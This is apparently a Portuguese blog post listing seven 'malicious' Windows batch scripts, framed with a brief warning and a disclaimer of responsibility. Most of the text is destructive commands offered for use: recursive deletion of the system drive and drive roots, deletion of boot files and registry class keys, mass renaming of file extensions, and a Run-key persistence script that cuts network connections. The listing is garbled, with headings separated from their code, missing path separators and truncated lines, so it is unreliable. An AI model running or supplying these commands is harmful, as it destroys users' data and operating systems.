Códigos Maliciosos do CMD do Windows
Hoje, pretendemos apresentar a vocês sete códigos maliciosos do CMD do Windows. Esses sete códigos são alguns dos mais perigosos que um invasor pode usar para comprometer seu sistema, disfarçando-os como arquivos úteis no formato .bat. Portanto, antes de executar qualquer arquivo .bat, lembre-se de abri-lo em um editor e analisar o código.
Códigos Perigosos:
- Formatação e Destruição do Disco Rígido:
- Conversão de Extensões Executáveis para Texto:
- Exclusão de Arquivos Importantes do System32:
- Desativação do Sistema:
- Exclusão de Todas as Chaves do Registro:
- Desconexão de Todas as Conexões de Internet:
- Formatação de Unidades (Adicione as Unidades Desejadas):
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00
*.DOC*.TXT REN*.JPEG*.TXT
REN *.LNK*.TXT
REN *.AVI*.TXT
REN *.MPEG*.TXT
REN *.COM*.TXT
REN *.BAT*.TXT
c:\WINDOWS\SYSTEM32\*.*/q
off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntldr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
@mashedhack >c:windowswimn32.bat
echo break off »c:windowswimn32.bat
echo ipconfig /release_all»c:windowswimn32.bat
echo end»c:windowswimn32.bat
reg add hkey_local_machineoftwindowscurrentversionrun /v
WINDOWsAPI/t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit/t reg_sz /d c:windowswimn32.bat /f
PAUSE
D:\
rd/s/q C:\
rd/s/q E:\
Lembre-se de não usar esses comandos de forma irresponsável. A responsabilidade pelo uso desses comandos é sua.